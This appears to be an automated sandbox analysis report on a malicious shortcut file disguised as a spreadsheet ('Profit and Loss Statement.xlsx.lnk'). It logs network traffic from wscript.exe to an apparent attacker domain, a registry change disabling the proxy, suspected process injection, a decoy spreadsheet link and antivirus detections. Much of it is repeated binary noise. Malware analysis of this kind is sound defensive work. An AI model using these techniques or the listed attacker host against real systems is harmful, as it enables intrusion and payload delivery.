WSASend Oct. 23, 2021, 10:22 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: soÒnÉqÊ@>ñiZÎÕ¾;á¬Gjêú®¶A`a?=¬xh[Pï«ÐjôCNÂ]²YôxÉÌá5Ã°Y¼?ÃÄªsl#²©¹ÿ$>CPH0½:íùÕºäq±Ç´ÁaMÇní,WWíXkéÏðA2é«xÙ}lO Ø´OÑnÆÇ;÷"Þ§ë&Bes«8ÚOl(ð\|;jgð"®ðÍöµxZ:;°AÔ@kßaIaeìtÓ &GÓé1ÙIz9CKïÌ+Ác[ã{íU9»eÕsAÝfÞ19ÝYv¢õÚ[Õ>È@~¾ôaX¼¸Ì»Ç socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: À¿vS7{þë³©üGtçQzã:Ë=v socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: déÎ8 ½K"#g·çQêªPîgY8À¶Ã socket: 404		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: yuasdcI×jáoBÀaØrì¸¤ðù?GgÇ/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: FBAñÊÚç¥øàæ+¢·wÅ\?8[º@ßê ÔÇQuvey³ýF]ý ªþ¹ÎvD¬£0lÿ®uÙÑñÇ§ÛLoÏÿ¤§éKdRS;¸)Ý5»©ÝÊ4¼oàÓzâ socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: 4Ê«Ôl®¸¹0ºuéAqØç3D096¶Q<Ý¬Ðáq´¨ÊéªaY§'ò_ÙrÕ:ï¥7¡ë¦ÔI\Î«ï3S(Õ¿N»è>uP¶EvµS¨ùç=d0\|=ÑÃKÇG[SîO+§`,££¡x±Ãp(z3FóÊzÈ]pz'B×=ËÓ¼ O¾ý©L(%)ÕõÖ11wÆâó{u Më®UØ:79Di¬ÅKT»£3ìáà\|¹ò¯l¤r7¶©§ ÔËSDS÷à 2ã'#ÏÊçàÛò¶ÓÛZ/Zÿ°«Ï3ÑÑ°7 socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: éÄW8j¹9À\<!üRusÃìad ËöNW socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: ß]ïÐwuñr¹Ç2/÷ßëå.ÜL³ÉF socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: yuasdsÑ;½ðRpe°ÃzÏ¹ôÝvÄöýö{ÿ\|Ü<Ñz/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: FBA°d:vÝjzËµ¾K¸bêç¬¼r!MûÏÃïê>÷Xüt¼Ãw¯O/Ef"R¹*òË0½Yr¨ÈNºÏs2¢S+±É b¿ÆFôä±\©/Þ¹¼>ñ¾F$ü socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: §ëaP É]ºk'¯PÞK¢´þLè0éÜ-e_ÆõþÁf$ÁâùïAËid;ÚÐå»ez0OórÇJ9ÅM\|K¼XQ2Yxûú{)ø~rFÇg((î+r·êÕ&ÉåFÎãßúA£Tæò çhB¾/=Qì3ÝïeÎèe%ícq¹¦vðNS«Ü¸íE-ð¿á#UJ«jÃcfLtÀçü´UIê>ØiPlp-ÕÇ²xËpO¨îYR4Å¾mGUD[)ý¯`2àm³ b¢¯ÛÚWa9§Z°=¦}.¸5vUÛ1&!4 socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: 7äbAáÔí_¤áJG 1~Z¡Po socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: I/eÉâ¢c^´ û+×¾¾È]Ü³®ü.. socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: yuasd5Q½\|LæwÆD^gø&ÉËñéÆtÏ+d/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: FBA@éS'ýÜ<úÞ¾\|R ä"øsFFºðÈußÿÇhqØQ-;ßIÇé ÕÐ¡×/ UøFù¿±0º¨:w[=?ÓN6Ý\|Z`nò;unýÞ¾3ècý R+feãüÑÒä§~?Áþ socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: CWN.æým2YÚõn±ô]=ê·)Ée3ÞÈá£¯O[9@¾ ê«¦y« ;xòªp\9«k õýS¤b¾- w/ùb¥Ïì¯\Ì«!)ÏWSÎWôé·[ÁÙ.ìyà¨ÛZ ëÄqô%OÂiçmÈl[óa{±5M²ñÍj9î/1¦jhS¤brPéð^ùHe!²3Êª5*õ¸s¾áî¢ï×½£ÈÞàG'sÿY¥ÌNz1¿ÆP`AÂHkz·%æ\|RxØí[Wye6 Âb»£¸Xv § är3» #]c¿Åé¥ socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: 0ÚB=SCd$H°] û²;rÖHsq=à socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: DÂ:=YpHg·e÷À®´y5qáPû2$Zµp ß socket: 408		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: yuasd#ìnNóHCOm`ÉÔ£8NZÏFÞX0Ö/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 592		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: FBA½PJdßq¥,ÀÈÿ-O±wÚ?ºRÌW&Y¥ÖÜkL£ø»Ýãªm®u2ìSoJ00¦¨¤E¬ÐRCåì¯»Õúý±·qô$?¤îàhL9qÔÁ§¾K² socket: 592		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1140		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: Í5CrÀiaÈ«ì®àg®¼`^bê«Þ¨Ú{ÆzK fydõ}>ÞòµÏ1 DdàÇ¹ÄaØNn2ÛñÄ6Ç¨²v²zÅ¢sÚÿ%àB¯+õfà$Å·gM±hf5]áA[N}EY¬HîT;¿¤0)ÅðÕEÇ)½}#ÁÐsÇÉªS]Ö ¼vHZåðMñ,ã±ì³á®ßy_ laþ¼æ¸BO¹Ü÷'9¾æÓßÝbI½'³vø·®ÃÆèÐLö_AåGÜx-zåÌJ+jv Ä2:Ýþ¼óaf$(J5 socket: 592		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: &Ír«ÐrÑe®*òå<Í%ìËJÖîÖ\|ëæ socket: 592		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: .Å$¾Ûx¶0°i$xø\Þ$#ñBÛ socket: 592		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasd3lî£àEZÐ /¯=,mµ@fprÎ(n+/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 1148		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: aI0GBAx¿ÁÎ¡z1¸è×[Ên$£~k«úujïÑUÞ¹Þa°:¬ÇfùÔ_Büò'¥Ïµ6ÈQ3÷²<0@ K÷·1xßÂ²½?rµª%4ÿ\ÖØðåuK·©j?Úÿ]1{É% socket: 1148		0	0

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 23, 2021, 10:21 a.m.	key_handle: 0x000002c0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 83 events)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: yuasd" 7EõJ\KÝwm`³xûR=#{M/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 596		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: FBA1iÞï«ÿ1aa$&xF ñÊ{Òc ÜiE¢Dä§2jU´éy82ò8íLæ/Ò«{´0ïèyTÈÐM9ô7PmÚÃ¶.4û> µêãX$ñC{N#lAè¶í socket: 596		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: ÄÖzAëÐäØG²ÂÚbi?Y+ÕùäJoÚÏçô;)Ý\|BoP0'ûrìwOªÔø^Ý®ã11j1îÓèà¿HÌ}ÐQÝ_È$s»{{Às%cí~sU'3~E÷§íÊAÙkZÔùäJ-:#$W at6Ò ^E÷tã%åÃØ(«¼íÆ#~0àê¼PÒÚÔÄ3²TqfÅ³èÑ²F©y[jË¬4E½M-j4 ªüµûyZryº é}§GN¼4sûyÚWÁ$¹(ÀÂ\|jubnðizwÓÞ=0^í=\Ê¥>Ô6y socket: 596		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: P0¦#eM"-þ:W1mºÃ¤'Ow« socket: 596		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: $õË'sû¶Jèwa¶Xó±F÷òÿí%áUÛcx6Æ socket: 596		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasd3â>à% NMÞ#iôãp2â Øá¡ÿ/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: FBA"&Ãq`Ì8Uáu£f¡Ç3ÕQïûeñfwáabV·/útõQpÒÇSßÓ¸?wGoÔÓ0u[5è=õüë§&M»±°µx\|¯ïßóòÕ?zî¢ãJJû¶î)\|åwg socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: /ZLK;ÍÀ[îØ§ÝrU¼eçÛê;ëH\|´à\|p nÍG F0&dDC/yzNý°Úýr\øÙ«qZÍ2 6èÓp<vèãïmñ; ¢°ìôÖµ3º}û:#ÁBÖ T°9Ùw¼Ám èDqoL7vçæ,®+ö¾ýyÛA"3.^yÝl¦wÖÔjt¬ø'»öyãdEêS¬$ÅóNüâß¸GDÄixG=I.nù¹®Wyº¯â[[dGgýû:`Ð®ëoøð<º¨áÅÅ½í~Ñ¢iº ÷ ¿½\|ý¨ÇÈ]tÁDÉ socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: Ó´À8-T\æãBþçb²¯ìíÅäÁà`[D socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: %ÐbNnwTÍ·D!^¥Áàk ÀCXBÛBk%$ socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasdCÌC²¿¿-G$ ¤¾c(:Ìbò'ødÕù²O£/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: FBAbÂ´¬Ì§×$ ¤nzzûx%èXÐëøW?åQxGªâ×ê~ã4å(fd³4êNn¯J%_§YT0ÏÓ¹n[gõ,ã¯úÖô/ =3÷;´Mx$%ÛZP÷Â7<o$Vç» socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: ¢µÀ4¤K¨è¹]óÙ.2§?4á2N¯ãÅ²wS#ýKÍ5§7}à@§ä GKuD¥Ï-DVå¼¡äo1x8[?kkÎf§åÕ¹eÒéuOn ±Í¿´Z&+ ÃEzejª}1ÔEAu]>ÌêMÃ¬ûû!.ªnLoVêmN£N^ _ê4 Ö¡ìþµÆÙ)ðÃ¹6çxI7ßcj.Äñâj²cÒ&C¾µI+ã¸»Ë1U´nQPß%=&PsàÒ++$}ùqgó$XWÏÎÐ¨Gµ¼ö00¬yç<¥6^¹4]q Ô,}¿»ÃuWC socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: HÜÞHÊåö§÷ApjM{këYÔ·:ãÕÜqe· socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: ¨¹¸óo@ÿh?Úþ"E©ãðõñ¿ÜÏ socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasdSûcT©'A¯µB~:ëþADÁ2Az\|.2ò/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: FBAÍ\SK¡=b´} ùûÅ=èåÿ4¥ÖmÒzÉ»¥]ouä æ]MæZqymIüð*îÐý02M½CôXþo£B-³¦ S©:íú~ËF\|&È°ÑKOñNtbKE socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: soÒnÉqÊ@>ñiZÎÕ¾;á¬Gjêú®¶A`a?=¬xh[Pï«ÐjôCNÂ]²YôxÉÌá5Ã°Y¼?ÃÄªsl#²©¹ÿ$>CPH0½:íùÕºäq±Ç´ÁaMÇní,WWíXkéÏðA2é«xÙ}lO Ø´OÑnÆÇ;÷"Þ§ë&Bes«8ÚOl(ð\|;jgð"®ðÍöµxZ:;°AÔ@kßaIaeìtÓ &GÓé1ÙIz9CKïÌ+Ác[ã{íU9»eÕsAÝfÞ19ÝYv¢õÚ[Õ>È@~¾ôaX¼¸Ì»Ç socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: À¿vS7{þë³©üGtçQzã:Ë=v socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: déÎ8 ½K"#g·çQêªPîgY8À¶Ã socket: 404		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: yuasdcI×jáoBÀaØrì¸¤ðù?GgÇ/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: FBAñÊÚç¥øàæ+¢·wÅ\?8[º@ßê ÔÇQuvey³ýF]ý ªþ¹ÎvD¬£0lÿ®uÙÑñÇ§ÛLoÏÿ¤§éKdRS;¸)Ý5»©ÝÊ4¼oàÓzâ socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: 4Ê«Ôl®¸¹0ºuéAqØç3D096¶Q<Ý¬Ðáq´¨ÊéªaY§'ò_ÙrÕ:ï¥7¡ë¦ÔI\Î«ï3S(Õ¿N»è>uP¶EvµS¨ùç=d0\|=ÑÃKÇG[SîO+§`,££¡x±Ãp(z3FóÊzÈ]pz'B×=ËÓ¼ O¾ý©L(%)ÕõÖ11wÆâó{u Më®UØ:79Di¬ÅKT»£3ìáà\|¹ò¯l¤r7¶©§ ÔËSDS÷à 2ã'#ÏÊçàÛò¶ÓÛZ/Zÿ°«Ï3ÑÑ°7 socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: éÄW8j¹9À\<!üRusÃìad ËöNW socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: ß]ïÐwuñr¹Ç2/÷ßëå.ÜL³ÉF socket: 412		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: yuasdsÑ;½ðRpe°ÃzÏ¹ôÝvÄöýö{ÿ\|Ü<Ñz/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: FBA°d:vÝjzËµ¾K¸bêç¬¼r!MûÏÃïê>÷Xüt¼Ãw¯O/Ef"R¹*òË0½Yr¨ÈNºÏs2¢S+±É b¿ÆFôä±\©/Þ¹¼>ñ¾F$ü socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: §ëaP É]ºk'¯PÞK¢´þLè0éÜ-e_ÆõþÁf$ÁâùïAËid;ÚÐå»ez0OórÇJ9ÅM\|K¼XQ2Yxûú{)ø~rFÇg((î+r·êÕ&ÉåFÎãßúA£Tæò çhB¾/=Qì3ÝïeÎèe%ícq¹¦vðNS«Ü¸íE-ð¿á#UJ«jÃcfLtÀçü´UIê>ØiPlp-ÕÇ²xËpO¨îYR4Å¾mGUD[)ý¯`2àm³ b¢¯ÛÚWa9§Z°=¦}.¸5vUÛ1&!4 socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: 7äbAáÔí_¤áJG 1~Z¡Po socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: I/eÉâ¢c^´ û+×¾¾È]Ü³®ü.. socket: 568		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: yuasd5Q½\|LæwÆD^gø&ÉËñéÆtÏ+d/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: FBA@éS'ýÜ<úÞ¾\|R ä"øsFFºðÈußÿÇhqØQ-;ßIÇé ÕÐ¡×/ UøFù¿±0º¨:w[=?ÓN6Ý\|Z`nò;unýÞ¾3ècý R+feãüÑÒä§~?Áþ socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: CWN.æým2YÚõn±ô]=ê·)Ée3ÞÈá£¯O[9@¾ ê«¦y« ;xòªp\9«k õýS¤b¾- w/ùb¥Ïì¯\Ì«!)ÏWSÎWôé·[ÁÙ.ìyà¨ÛZ ëÄqô%OÂiçmÈl[óa{±5M²ñÍj9î/1¦jhS¤brPéð^ùHe!²3Êª5*õ¸s¾áî¢ï×½£ÈÞàG'sÿY¥ÌNz1¿ÆP`AÂHkz·%æ\|RxØí[Wye6 Âb»£¸Xv § är3» #]c¿Åé¥ socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: 0ÚB=SCd$H°] û²;rÖHsq=à socket: 408		0	0
WSASend Oct. 23, 2021, 10:23 a.m.	buffer: DÂ:=YpHg·e÷À®´y5qáPû2$Zµp ß socket: 408		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: yuasd#ìnNóHCOm`ÉÔ£8NZÏFÞX0Ö/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 592		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: FBA½PJdßq¥,ÀÈÿ-O±wÚ?ºRÌW&Y¥ÖÜkL£ø»Ýãªm®u2ìSoJ00¦¨¤E¬ÐRCåì¯»Õúý±·qô$?¤îàhL9qÔÁ§¾K² socket: 592		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1140		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: Í5CrÀiaÈ«ì®àg®¼`^bê«Þ¨Ú{ÆzK fydõ}>ÞòµÏ1 DdàÇ¹ÄaØNn2ÛñÄ6Ç¨²v²zÅ¢sÚÿ%àB¯+õfà$Å·gM±hf5]áA[N}EY¬HîT;¿¤0)ÅðÕEÇ)½}#ÁÐsÇÉªS]Ö ¼vHZåðMñ,ã±ì³á®ßy_ laþ¼æ¸BO¹Ü÷'9¾æÓßÝbI½'³vø·®ÃÆèÐLö_AåGÜx-zåÌJ+jv Ä2:Ýþ¼óaf$(J5 socket: 592		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: &Ír«ÐrÑe®*òå<Í%ìËJÖîÖ\|ëæ socket: 592		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: .Å$¾Ûx¶0°i$xø\Þ$#ñBÛ socket: 592		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasd3lî£àEZÐ /¯=,mµ@fprÎ(n+/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 1148		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: aI0GBAx¿ÁÎ¡z1¸è×[Ên$£~k«úujïÑUÞ¹Þa°:¬ÇfùÔ_Büò'¥Ïµ6ÈQ3÷²<0@ K÷·1xßÂ²½?rµª%4ÿ\ÖØðåuK·©j?Úÿ]1{É% socket: 1148		0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2476 resumed a thread in remote process 204
Process injection	Process 204 resumed a thread in remote process 2128
Process injection	Process 2596 resumed a thread in remote process 2812
Process injection	Process 2596 resumed a thread in remote process 548
NtResumeThread Oct. 23, 2021, 10:21 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 204	1	0	0
NtResumeThread Oct. 23, 2021, 10:21 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2128	1	0	0
NtResumeThread Oct. 23, 2021, 10:21 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2812	1	0	0
NtResumeThread Oct. 23, 2021, 10:21 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 548	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Oct. 23, 2021, 10:21 a.m.	thread_identifier: 2828 thread_handle: 0x000006e0 process_identifier: 2692 current_directory: C:\Users\Public filepath: C:\Windows\System32\explorer.exe track: 1 command_line: "C:\Windows\System32\explorer.exe" "https://docs.google.com/spreadsheets/d/1CTWarBPpx6kQjpevxr7qeQGPenjAR_7H/edit?usp=sharing&ouid=118006626630144401406&rtpof=true&sd=true" filepath_r: C:\Windows\System32\explorer.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006e4	1	1	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Lionic	Trojan.WinLNK.Nioc.4!c
CAT-QuickHeal	LNK.Agent.41324
ALYac	Heur.BZC.YAX.Nioc.1.078B6D01
Sangfor	Trojan.Generic-LNK.Save.6890a73b
Arcabit	Heur.BZC.YAX.Nioc.1.078B6D01
ESET-NOD32	LNK/Agent.GX
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Nioc.1.078B6D01
ViRobot	LNK.S.Downloader.22821
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.078B6D01
Tencent	Heur:Trojan.Winlnk.Downloader.wya
Ad-Aware	Heur.BZC.YAX.Nioc.1.078B6D01
Sophos	Troj/DownLnk-X
DrWeb	LNK.Downloader.207
FireEye	Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft	Heur.BZC.YAX.Nioc.1.078B6D01 (B)
Ikarus	Win32.Outbreak
GData	Heur.BZC.YAX.Nioc.1.078B6D01
AhnLab-V3	LNK/Autorun.Gen
MAX	malware (ai score=96)
VBA32	suspected of Trojan.Link.URL
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
SentinelOne	Static AI - Malicious LNK

Profit and Loss Statement.xlsx.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All